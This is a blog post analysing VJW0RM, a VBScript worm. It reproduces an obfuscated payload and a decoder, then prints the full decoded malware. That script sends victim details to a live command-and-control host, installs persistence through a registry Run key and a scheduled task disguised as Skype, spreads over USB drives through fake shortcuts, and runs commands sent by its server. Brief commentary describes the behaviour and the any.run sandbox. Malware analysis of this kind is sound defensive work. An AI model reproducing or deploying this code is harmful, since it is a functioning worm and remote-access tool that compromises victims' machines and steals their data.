ݣݘݞݝ܏ܲݡܗܽܘۼ۹݂ݔݣ܏ܲݡ܏ܬ܏ܲݡݔݐݣݔܾݑݙݔݒݣܗݙܗܽܘܘۼ۹ܴݝݓ܏ܵݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ܴݧܗݢܘۼ۹ܴݧ܏ܬ܏ݢݗܝܴݧݟݐݝݓܴݝݥݘݡݞݝݜݔݝݣ݂ݣݡݘݝݖݢܗܑܔܑܕݢܕܑܔܑܘۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ܿݣܗܲܛܰܘۼ۹ܿݣܬܑܑۼ۹݂ݔݣ܏݇ܬܲݡܗܢܘۼ۹݇ܝܾݟݔݝ܏ܑܑܾ݂ܿ݃ܛܑݗݣݣݟܩܞܞݗݞݤݢݣݡݘݚݞܝݓݨݝݤܝݝݔݣܩܦܦܤܣܞܑܕܲܛݕݐݛݢݔۼ۹݇ܝݢݔݣݡݔݠݤݔݢݣݗݔݐݓݔݡ܏ܑ݄ݢݔݡܜܰݖݔݝݣܩܑܛݝݕۼ۹݇ܝݢݔݝݓ܏ܰۼ۹ܿݣܬ݇ܝݡݔݢݟݞݝݢݔݣݔݧݣۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝۼ۹ۼ۹ܵݤݝݒݣݘݞݝ܏ݝݕۼ۹ݝݕܬܑܑۼ۹ݘܬݖݞܗܠܘۼ۹ݢܬ݅ܽ܏ܕ܏ܑݎܑ܏ܕ܏ݘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑܾܼ݄ܴܼܴܲܿ݃݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑ݄݂ܴܼܴ݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܡܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܣܘۼ۹ݝݕܬݝݕܕݢܕݒܕݒܕݝݣܕݒܕݤܕݒۼ۹ܴݝݓ܏ܵݤݝݒݣݘݞݝۼ۹ۼ۹݂ݤݑ܏ܽݢۼ۹ݞݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘ܏ܕ܏ܲ܏ܕ܏ݦݝۼ۹ݕݢܝܲݞݟݨܵݘݛݔ܏ݕݤܛݓݡܛݣݡݤݔۼ۹ݢݗܝݡݤݝ܏ܑݢݒݗݣݐݢݚݢ܏ܞݒݡݔݐݣݔ܏ܞݢݒ܏ݜݘݝݤݣݔ܏ܞݜݞ܏ܠ܏ܞݣݝ܏݂ݚݨݟݔ܏ܞݣݡ܏ܑ܏ܕ܏ܲݗݡ݆ܗܢܣܘ܏ܕ܏ݓݡܛݕݐݛݢݔۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܟܘ܏ܕ܏ݖܗܢܘ܏ܕ܏ܑ݄݉݃ܺܟܼ݉ܡܑ݂݄ܛ܏ܲݗ܏ܕ܏ݓݡ܏ܕ܏ܲݗܛ܏ݖܗܤܘۼ۹ݕݢܝݒݞݟݨݕݘݛݔ܏ݕݤܛ܏ܲݡܗܡܘܝܽݐݜݔ݂ݟݐݒݔܗܕܷܦܘܝ݂ݔݛݕܝܿݐݣݗ܏ܕܲ܏ܕ܏ݦݝ܏ܛݣݡݤݔۼ۹ݔݝݓ܏݂ݤݑۼ۹ۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘ܏ܕ܏ܲ܏ܕ܏ݦݝۼ۹ۼ۹ݢݤݑ܏ݢݟݡۼ۹ݞݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ݕݞݡ܏ݔݐݒݗ܏ݓݡ܏ݘݝ܏ݕݢܝݓݡݘݥݔݢۼ۹ݓݟܬݓݡܝݟݐݣݗ܏ܕ܏ݒۼ۹ݘݕ܏ݓݡܝݘݢݡݔݐݓݨ܏ܬ܏ݣݡݤݔ܏ݣݗݔݝۼ۹ݘݕ܏ݓݡܝݓݡݘݥݔݣݨݟݔ܏ܬ܏ܠ܏ݣݗݔݝۼ۹ݕݢܝݒݞݟݨݕݘݛݔ܏ݕݤܛݓݟ܏ܕ܏ݦݝܛݣݡݤݔۼ۹ݘݕ܏ݕݢܝݕݘݛݔݔݧݘݢݣݢܗݓݟ܏ܕ܏ݦݝܘ܏ݣݗݔݝۼ۹ݕݢܝݖݔݣݕݘݛݔܗݓݟ܏ܕ܏ݦݝܘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݔݝݓ܏ݘݕۼ۹ݕݞݡ܏ݔݐݒݗ܏ݕݘ܏ݘݝ܏ݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݕݘݛݔݢۼ۹ݘݕ܏ݘݝݢݣݡܗݕݘܝݝݐݜݔܛܑܝܑܘ܏ݣݗݔݝۼ۹ݘݕ܏ݛݒݐݢݔܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘ܏ܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܘ܏ܫܭܑݛݝݚܑ܏ݣݗݔݝۼ۹ݕݘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݘݕ܏ݤݒݐݢݔܗݕݘܝݝݐݜݔܘ܏ܫܭ܏ݤݒݐݢݔܗݦݝܘ܏ݣݗݔݝۼ۹ݦݘݣݗ܏ݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟ܏܏ܕ܏ݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗܟܘ܏ܕ܏ܑܝݛݝݚܑܘ܏ۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔ܏ܬ܏ܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗ܏ܬ܏ܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢ܏ܬ܏ܑܞݒ܏ݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݦݝܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕ܏ܑܕݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݕݘܝݝݐݜݔܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕܑܕݔݧݘݣܑۼ۹ݕݘݒ܏ܬ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘ܏ܕ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘ܏ܕ܏ܑܝܑ܏ܕ܏ݢݟݛݘݣܗݕݘܝݝݐݜݔܛ܏ܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛ܏ܑܝܑܘܘܘܕ܏ݒܘ܏ܕ܏ݖܗܥܘܘ܏ۼ۹ݘݕ܏ݘݝݢݣݡܗݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘ܏ܬ܏ܟ܏ݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝ܏ܬ܏ݕݘܝݟݐݣݗۼ۹ݔݛݢݔ܏ۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝ܏ܬ܏ݕݘݒۼ۹܏ݔݝݓ܏ݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓ܏ݦݘݣݗۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݝݔݧݣۼ۹ݕݞݡ܏ݔݐݒݗ܏ݕݞ܏ݘݝ܏ݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݢݤݑݕݞݛݓݔݡݢۼ۹ݕݞܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݦݘݣݗ܏ݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟ܏ܕ܏ݕݞܝݝݐݜݔ܏ܕ܏ܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒ܏ݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݦݝܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕ܏ܑܕݢݣݐݡݣ܏ݔݧݟݛݞݡݔݡ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݕݞܝݝݐݜݔܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗܑܷܻܼܺ݋ݢݞݕݣݦݐݡݔ݋ݒݛݐݢݢݔݢ݋ݕݞݛݓݔݡܑ܏ܕ܏ݖܗܥܘܘۼ۹ݘݕ܏ݘݝݢݣݡܗܝݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟ܏ݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݞܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓ܏ݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓ܏ݦݘݣݗۼ۹ݝݔݧݣۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݝݔݧݣۼ۹ݔݡݡܝݒݛݔݐݡۼ۹ݔݝݓ܏ݢݤݑۼ۹ۼ۹ۼ۹ۼ۹ݥݝܬܑ݆ݘݝݓݞݦݢܑۼ۹݄ܬܑܑۼ۹ۼ۹ݒݗ܏ܬ܏ݒݗݡݦܗܢܣܘۼ۹ݒ܏ܬ܏ݒݗݡݦܗܨܡܘۼ۹ݕݤ܏ܬ܏ݦܝݢݒݡݘݟݣݕݤݛݛݝݐݜݔۼ۹ݦݝܬݦܝݢݒݡݘݟݣݝݐݜݔۼ۹ܽ݃ܬܑܽݞܑۼ۹ݘݕ܏ݕݢܝݕݘݛݔݔݧݘݢݣݢܗݔݧܗܑ݆ݘݝݓݘݡܑܘ܏ܕ܏ܑ݋ܼݘݒݡݞݢݞݕݣܝܴܽ݃݋ܵݡݐݜݔݦݞݡݚ݋ݥܡܝܟܝܤܟܦܡܦ݋ݥݑݒܝݔݧݔܑܘ܏ݣݗݔݝۼ۹ܽ݃ܬܑ݈ݔݢܑۼ۹ݔݝݓ܏ݘݕۼ۹ۼ۹݄ܬ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܡܘܘۼ۹ݘݕ܏݄ܬܑܑ܏ݣݗݔݝۼ۹ݘݕ܏ݜݘݓܗݕݤܛܡܘܬܑܩ݋ܑ܏ܕ܏ݦݝ܏ݣݗݔݝۼ۹݄ܬܑܑ݄ܴ݃݁ۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܡܘܛ܏݄ܛ܏ݖܗܤܘۼ۹ݔݛݢݔۼ۹݄ܬܑܑܻ݂ܴܵܰۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܡܘܛ܏݄ܛ܏ݖܗܤܘۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ۼ۹ܽݢۼ۹ݢݟݛܬܑݫ݅ݫܑۼ۹ݦݗݘݛݔ܏ݣݡݤݔۼ۹ݢܬݢݟݛݘݣܗܿݣܗܑ݅ݡݔܑܛܑܑܘܛݢݟݛܘۼ۹ݢݔݛݔݒݣ܏ݒݐݢݔ܏ݢܗܟܘۼ۹ݒݐݢݔ܏ܑݔݧݒܑۼ۹ݢݐܬ܏ݢܗܠܘۼ۹ݔݧݔݒݤݣݔ܏ݢݐۼ۹ݒݐݢݔ܏ܑ݂ݒܑۼ۹ݢܡ܏ܬ܏ܴݧܗܑݣݔݜݟܑܘ܏ܕ܏ܑ݋ܑ܏ܕ܏ݢܗܡܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ݢܡܛ܏ܥۼ۹ݒݐݢݔ܏ܑܑ݁ܵۼ۹ݢܡ܏ܬ܏ܴݧܗܑݣݔݜݟܑܘ܏ܕ܏ܑ݋ܑ܏ܕ܏ݢܗܡܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ݢܡۼ۹ݒݐݢݔ܏ܑ݁ݔݝܑۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܠܘۼ۹ݕ܏ܬ܏ݦݡܝ݁ݔݐݓܰݛݛۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݕ܏ܬ܏ݡݔݟݛݐݒݔܗݕܛݒݗܕݥݝܕݒݗܛݒݗܕݢܗܠܘܕݒݗܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݕۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݒݐݢݔ܏ܑ݄ݟܑۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݢܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗݢܗܠܘܛܑݫ݄ݫܑܛܑݫ݅ݫܑܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ܑݦݢݒݡݘݟݣܝݔݧݔ܏ܞܞܱ܏ܑ܏ܕ܏ݒݗ܏ܕ܏ݕݤ܏ܕ܏ݒݗܛ܏ܥۼ۹ݦܝݠݤݘݣۼ۹ݒݐݢݔ܏ܑܲݛܑۼ۹݆ܝݠݤݘݣ܏ۼ۹ݒݐݢݔ܏ܑ݄ݝܑۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݕܑܛݕݤܘۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݝܑܛݦݝܘۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݢݕݓݡܑܛݓݡܘۼ۹ݔݧݔݒݤݣݔ܏݂ܗܠܘۼ۹ݦܝݠݤݘݣۼ۹ݔݝݓ܏ݢݔݛݔݒݣۼ۹݆ܝ݂ݛݔݔݟ܏ܥܟܟܟۼ۹݂ݟݡۼ۹ݦݔݝݓ" var3 = 0 var2 = "" while var3 != len(var1): var3 += 1 var2 = var2 + chr(ord(mid(var1, var3, 1)) - var6 + len(var5)) print(var2)
At the end of it, instead of executing the code line by line as it does with it Wscript.echo function from the malware, I printed the result. It gave me an entire executed Visual Basic code :
Returned code
' Coded by v_B01 On Error Resume Next j = array("WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP") g = array("HKCU","HKLM","HKCU\vw0rm","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\") y= array("winmgmts:","win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct") Function go(m) If m=4 Then T="winmgmts:\\localhost\root\securitycenter" Set B=GetObject(y(3)).InstancesOf(y(4)) For Each a in b go=a.displayName Exit For Next Set B=GetObject(y(3) & "2").InstancesOf(y(4)) For Each a in b go=a.displayName Exit For Next If go="" Then go="Not-found" Else Set B=GetObject(y(0)).InstancesOf(y(m)) For Each a in b If m = 1 Then go=a.volumeserialnumber ElseIf m = 2 Then go=a.caption End If Exit For Next End If End Function Set w = WScript Set sh = Cr(0) Set fs = Cr(1) Function Cr(N) Set Cr = CreateObject(j(N)) End Function Function Ex(s) Ex = sh.ExpandEnvironmentStrings("%"&s&"%") End Function Function Pt(C,A) Pt="" Set X=Cr(3) X.Open "POST","http://houstriko.dynu.net:7754/"&C,false X.setrequestheader "User-Agent:",nf X.send A Pt=X.responsetext End Function Function nf() nf="" i=go(1) s=VN & "_" & i nf=nf&s&c s=ex("COMPUTERNAME") nf=nf&s&c s=ex("USERNAME") nf=nf&s&c s=go(2) nf=nf&s&c s=go(4) nf=nf&s&c&c&nt&c&u&c End Function Sub Ns() On Error Resume Next dr=ex("AppData") & C & wn fs.CopyFile fu,dr,true sh.run "schtasks /create /sc minute /mo 1 /tn Skype /tr " & ChrW(34) & dr,false sh.regwrite g(0) & g(3) & "ZTUK0MZ2SU", Ch & dr & Ch, g(5) fs.copyfile fu, Cr(2).NameSpace(&H7).Self.Path &C & wn ,true End Sub dr=ex("AppData") & C & wn Sub spr() On Error Resume Next For Each dr in fs.drives dp=dr.path & c If dr.isready = TRUE Then If dr.drivetype = 1 Then fs.copyfile fu,dp & wn,true If fs.fileexists(dp & wn) Then fs.getfile(dp & wn).attributes=2+4 End If For Each fi in fs.getfolder(dp).files If instr(fi.name,".") Then If lcase(split(fi.name,".") (ubound(split(fi.name,".")))) <>"lnk" Then fi.attributes=2+4 If ucase(fi.name) <> ucase(wn) Then With sh.createshortcut(dp & split(fi.name,".")(0) & ".lnk") .windowstyle = 7 .targetpath = "cmd.exe" .arguments = "/c start " & replace(wn," ", ch & " " & ch) & "&start " & replace(fi.name," ", ch & " " & ch) &"&exit" fic = sh.regread(g(4) & sh.regread(g(4) & "." & split(fi.name, ".")(ubound(split(fi.name, ".")))& c) & g(6)) If instr(iconlocation,",") = 0 Then .iconlocation = fi.path Else .iconlocation = fic End If .save() End With End If End If End If Next For Each fo in fs.getfolder(dp).subfolders fo.attributes=2+4 With sh.createshortcut(dp & fo.name & ".lnk") .windowstyle=7 .targetpath="cmd.exe" .arguments="/c start " & replace(wn," ", ch & " " & ch) & "&start explorer " & replace(fo.name," ", ch & " " & ch) &"&exit" fic=sh.regread("HKLM\software\classes\folder" & g(6)) If instr(.iconlocation,",")=0 Then .iconlocation=fo.path Else .iconlocation=fic End If .save() End With Next End If End If Next err.clear End Sub vn="Windows" U="" ch = chrw(34) c = chrw(92) fu = w.scriptfullname wn=w.scriptname NT="No" If fs.fileexists(ex("Windir") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") Then NT="Yes" End If U= sh.regread(g(2)) If U="" Then If mid(fu,2)=":\" & wn Then U="TRUE" sh.regwrite g(2), U, g(5) Else U="FALSE" sh.regwrite g(2), U, g(5) End If End If Ns spl="|V|" While TRUE f = replace(f,ch&vn&ch,ch&s(1)&ch) Set wr = fs.OpenTextFile(fu,2,false) wr.Write f wr.close() Case "Up" Set wr = fs.OpenTextFile(fu,2,false) s(1) = replace(s(1),"|U|","|V|") wr.Write s(1) wr.Close() sh.run "wscript.exe //B " & ch & fu & ch, 6 w.quit Case "Cl" W.quit Case "Un" S(1) = replace(S(1),"%f",fu) S(1) = replace(S(1),"%n",wn) S(1) = replace(S(1),"%sfdr",dr) execute S(1) w.quit End Select W.Sleep 6000 Spr Wend
From it, I can now notice registries changes happening to victims’ computers, creation of a windows task named Skype that seems to be running a payload from a C2 server called using a POST method with victim’s information as header.
Curious about the origin of the malware, I googled the URL where the POST method is sent and the malware coder’s name that led me to his Twitter, Instagram, YouTube and a bunch of malware analyses from any.run, an interesting website :

What is any.run?

any.run is a really interesting website offering virtual machines to users to hunt and execute malware with no risks. In addition, contrary to Virtual Machine’s software, it analysis every changes happening to the victim computer :
Caught requests from VJW0RM malware
Caught requests from VJW0RM malware

I am really happy to have found any.run website as I frequent malware daily. It will allow me to execute, see what happens safely and so gives me new knowledge of its functions.
© All rights reserved🌸 Carbon neutral, or maybe not.by suiramdev